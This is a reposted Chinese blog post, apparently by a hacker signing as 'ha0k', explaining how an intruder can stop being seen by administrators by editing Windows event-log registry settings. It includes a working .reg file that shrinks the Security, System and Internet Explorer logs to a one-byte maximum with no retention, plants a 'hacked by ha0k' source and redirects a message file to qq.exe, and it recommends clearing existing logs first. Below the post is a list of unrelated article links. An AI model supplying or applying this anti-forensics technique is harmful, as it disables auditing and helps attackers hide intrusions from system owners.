修改日志文件属性保护自己不会被管理员发现(思路)-白红宇

修改日志文件属性保护自己不会被管理员发现(思路)

阅读量：2434 次

发布时间：2019-05-10

本文共 813 字，大约阅读时间需要 2 分钟。

by ha0k

日志文件的位置其实是存储在注册表中的,只要我们修改了其属性即可掩盖自己的入侵痕迹,

这里只修改默认位置,日志大小属性,比如日志大小为00000001,使其不能正常记录,

这样的话即可完美保证入侵不被记录,比清除日志更安全.当然首先配合清除日志工具,清除先前的痕迹,效果更好.

以下是demo代码:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Internet Explorer]

"MaxSize"=dword:00000001

"File"="%SystemRoot%/System32/Config/Internet Explorer.evt"

"Retention"=dword:00000000

"Sources"="hacked by ha0k"

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Security]

"file"="%SystemRoot%/System32/config/SecEvent.Evt"

"MaxSize"=dword:00000001

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/System]

"EventMessageFile"="%systemroot%/system32/qq.exe"

"File"="%SystemRoot%/system32/config/SysEvent.Evt"

"MaxSize"=dword:00000001

{本文转自普瑞斯特博客-原文地址:http://www.hacksb.cn/post/144.html}

转载地址：http://nkqmb.baihongyu.com/

你可能感兴趣的文章

OOAD利器Rational Rose的介绍

查看>>

SCA客户端以及基于Java的模型实现(一)

通过RUP用例进行需求管理的可追踪性策略(2)

查看>>

持续改进之配置管理变更的关键路径

查看>>

SCA客户端以及基于Java的模型实现(四)

mongodb replica sets 测试

查看>>

linux AS6.2 与 as5.4 的对比，性能提升明显

查看>>

FLASHCACHE 的是是非非

查看>>

length（） between oracle and postgresql

查看>>

求无序数组总第n大的数

查看>>